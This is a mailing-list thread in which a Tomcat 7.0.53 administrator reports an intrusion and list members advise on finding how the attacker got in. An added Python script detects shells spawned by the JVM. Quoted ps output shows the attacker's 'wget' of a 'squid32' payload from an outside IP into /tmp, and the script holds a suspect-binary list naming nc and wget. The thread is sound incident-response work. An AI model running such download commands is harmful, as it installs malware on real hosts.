>> paste on pastebin access logs, config files, whatever you tell
>> me.
>> 
>> This is my pstree
>> 
>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>> init─┬─atd
>>      ├─java─┬─sh───wget
>>      │      └─263*[{java}]
> 
> sh launched by tomcat's java?

Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.

> Take a thread dump:
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
> It shall show the stack trace of the thread that launched the external
> process.

+1

The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.

A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.

-chris


Re: Regarding i think an intrusion

Posted by Konstantin Kolinko <kn...@gmail.com>.
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello Dan,
>
> Nope, the attacker is executing the following locally
>
> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And then it launches squid, which tries to connect via ssh to various places.
>
> Right now it's time to leave the office, but in a few hours I will paste on
> pastebin access logs, config files, whatever you tell me.
>
> This is my pstree
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
>      ├─java─┬─sh───wget
>      │      └─263*[{java}]

sh launched by tomcat's java?

Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

It shall show the stack trace of the thread that launched the external process.

Best regards,
Konstantin Kolinko



Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Sorry, but I forgot to post:

/usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)


Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-29 17:41 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:

> Hello Dan,
>
> Nope, the attacker is executing the following locally
>
> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And then it launches squid, which tries to connect via ssh to various places.
>
> Right now it's time to leave the office, but in a few hours I will paste on
> pastebin access logs, config files, whatever you tell me.
>
> This is my pstree
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
>      ├─atop
>      ├─crond
>      ├─dbus-daemon
>      ├─events/0
>      ├─events/1
>      ├─events/2
>      ├─events/3
>      ├─httpd───8*[httpd]
>      ├─irqbalance
>      ├─2*[iscsid]
>      ├─iscsiuio───3*[{iscsiuio}]
>      ├─java─┬─sh───wget
>      │      └─263*[{java}]
>      ├─khelper
>
> By the way, the log files are really big, 200 MB each one; I'll try to set up a
> Dropbox account so I can share them.
>
> Thanks and regards
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dm...@gopivotal.com>:
>
> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
>> lsantagostini@gmail.com> wrote:
>>
>> > Hello list,
>> >
>> > Im facing an issue in 6 tomcat server that are getting penetrated and
>> they
>> > are executing malicious scripts on my server.
>>
>> Can you share more about what they are doing?  It might give some clues
>> as to how they are accessing your machines.  For example, if they are
>> deploying a WAR file to your server, it could mean that they have access to
>> the Manager application on your server.
>>
>> Any details you can share might be helpful.
>>
>> > Im using 7.0.53 on my servers. Running Centos 5.8
>> >
>> > Let me know what information you need.
>>
>> Do you have an access log?  If not, enable one.  If the attacker is not
>> deleting it, it could show you more about who they are and what requests
>> they are executing to access your server.  Assuming they are entering
>> through your application and not some other way.
>>
>> Dan
>>
>> >
>> > PS: This is my first mail to this list, so i apologize for this not
>> gentle
>> > presentation.
>> >
>> > Saludos.-
>> > Leonardo Santagostini
>> >
>> > <http://ar.linkedin.com/in/santagostini>
>>
>

Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Dan,

Nope, the attacker is executing the following locally

tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid

And then it launches squid, which tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste on
pastebin access logs, config files, whatever you tell me.

This is my pstree

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
     ├─atop
     ├─crond
     ├─dbus-daemon
     ├─events/0
     ├─events/1
     ├─events/2
     ├─events/3
     ├─httpd───8*[httpd]
     ├─irqbalance
     ├─2*[iscsid]
     ├─iscsiuio───3*[{iscsiuio}]
     ├─java─┬─sh───wget
     │      └─263*[{java}]
     ├─khelper

By the way, the log files are really big, 200 MB each one; I'll try to set up a
Dropbox account so I can share them.

Thanks and regards

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dm...@gopivotal.com>:

> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
> lsantagostini@gmail.com> wrote:
>
> > Hello list,
> >
> > Im facing an issue in 6 tomcat server that are getting penetrated and
> they
> > are executing malicious scripts on my server.
>
> Can you share more about what they are doing?  It might give some clues as
> to how they are accessing your machines.  For example, if they are
> deploying a WAR file to your server, it could mean that they have access to
> the Manager application on your server.
>
> Any details you can share might be helpful.
>
> > Im using 7.0.53 on my servers. Running Centos 5.8
> >
> > Let me know what information you need.
>
> Do you have an access log?  If not, enable one.  If the attacker is not
> deleting it, it could show you more about who they are and what requests
> they are executing to access your server.  Assuming they are entering
> through your application and not some other way.
>
> Dan
>
> >
> > PS: This is my first mail to this list, so i apologize for this not
> gentle
> > presentation.
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
>
>
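
The ps and pstree output in the message above is exactly what a process-tree check looks for: a JVM serving web applications normally has no child processes at all. The script below is an added example written for this page, not code from the thread. It reads the output of `ps -eo pid,ppid,user,args` and reports every process that descends from the java process or, failing that, runs as the JVM's user without descending from it (the `sh /tmp/4.sh` line above already has PPID 1, so it has been reparented to init and a parent walk alone would miss it), then notes interpreters, downloaders and anything under a world-writable temp directory. The sample process table is constructed to mirror the output above; 203.0.113.10 is a documentation placeholder standing in for the real download host, and the lists of suspect binaries and paths are my choice.

```python
"""Flag processes spawned beneath (or escaped from) a Tomcat JVM.

Added example for this page, not code from the thread.  Input is the
output of `ps -eo pid,ppid,user,args` on the Tomcat host.  A JVM serving
web applications normally has no children at all, so any descendant of
the java process is suspect.  A malicious child may double-fork and be
reparented to init (PPID 1), as `sh /tmp/4.sh` was in the thread, so a
second rule catches processes that run as the JVM's user but are neither
the JVM nor one of its descendants.
"""
import re
import sys

PS_LINE = re.compile(r'^\s*(\d+)\s+(\d+)\s+(\S+)\s+(.*)$')

# Interpreters and downloaders a webapp has no business spawning (assumed list).
SUSPECT_BINARIES = {"sh", "bash", "dash", "wget", "curl", "perl", "python", "nc", "ncat"}
# World-writable locations that dropped payloads usually live in (assumed list).
SUSPECT_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample patterned on the thread's ps/pstree output.
# 203.0.113.10 is a documentation placeholder, not the real host.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init [3]
 1234     1 root     /usr/sbin/atd
 2000     1 root     /usr/sbin/httpd
 2001  2000 apache   /usr/sbin/httpd
 4321     1 tomcat   /usr/java/default/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
 8882     1 tomcat   sh /tmp/4.sh
 8893  8882 tomcat   wget http://203.0.113.10/.xy/squid32 -O /tmp/squid
 9001  4321 tomcat   /tmp/squid
"""

def parse_ps(text):
    """Return {pid: (ppid, user, args)}; the header line has no PID and is skipped."""
    procs = {}
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            pid, ppid, user, args = m.groups()
            procs[int(pid)] = (int(ppid), user, args.strip())
    return procs

def is_java(args):
    argv = args.split()
    return bool(argv) and argv[0].rsplit("/", 1)[-1] == "java"

def descends_from_java(pid, procs):
    """Walk the parent chain; True if any ancestor is a java process."""
    seen = {pid}
    ppid = procs[pid][0]
    while ppid in procs and ppid not in seen:
        if is_java(procs[ppid][2]):
            return True
        seen.add(ppid)
        ppid = procs[ppid][0]
    return False

def suspicious_processes(text):
    """Return [(pid, user, args, reasons)] sorted by pid."""
    procs = parse_ps(text)
    jvm_users = {user for (_, user, args) in procs.values() if is_java(args)}
    findings = []
    for pid, (ppid, user, args) in sorted(procs.items()):
        if is_java(args):
            continue
        if descends_from_java(pid, procs):
            reasons = ["descendant of the JVM"]
        elif user in jvm_users:
            # e.g. a double-forked shell: PPID is now 1, but it still runs as tomcat
            reasons = [f"runs as JVM user '{user}' but is detached from it"]
        else:
            continue
        argv = args.split()
        binary = argv[0].rsplit("/", 1)[-1] if argv else ""
        if binary in SUSPECT_BINARIES:
            reasons.append(f"interpreter/downloader: {binary}")
        if any(p in args for p in SUSPECT_PATHS):
            reasons.append("touches a world-writable temp directory")
        findings.append((pid, user, args, reasons))
    return findings

if __name__ == "__main__":
    # Live use: ps -eo pid,ppid,user,args | python3 jvm_children.py
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PS
    for pid, user, args, reasons in suspicious_processes(source):
        print(f"{pid:>6} {user:<8} {args}\n       -> {'; '.join(reasons)}")
```

Run it as `ps -eo pid,ppid,user,args | python3 jvm_children.py` on each of the six hosts. The user-based rule assumes Tomcat runs under a dedicated account, as it does above (tomcat); if a webapp legitimately spawns helpers, keep an explicit allow-list of those commands rather than widening SUSPECT_BINARIES, since the point of the check is that anything else under that account is unexpected.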

Re: Regarding i think an intrusion

Posted by Daniel Mikusa <dm...@gopivotal.com>.
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <ls...@gmail.com> wrote:

> Hello list,
> 
> Im facing an issue in 6 tomcat server that are getting penetrated and they
> are executing malicious scripts on my server.

Can you share more about what they are doing?  It might give some clues as to how they are accessing your machines.  For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server.  

Any details you can share might be helpful.

> Im using 7.0.53 on my servers. Running Centos 5.8
> 
> Let me know what information you need.

Do you have an access log?  If not, enable one.  If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server.  Assuming they are entering through your application and not some other way.

Dan

> 
> PS: This is my first mail to this list, so i apologize for this not gentle
> presentation.
> 
> Saludos.-
> Leonardo Santagostini
> 
> <http://ar.linkedin.com/in/santagostini>

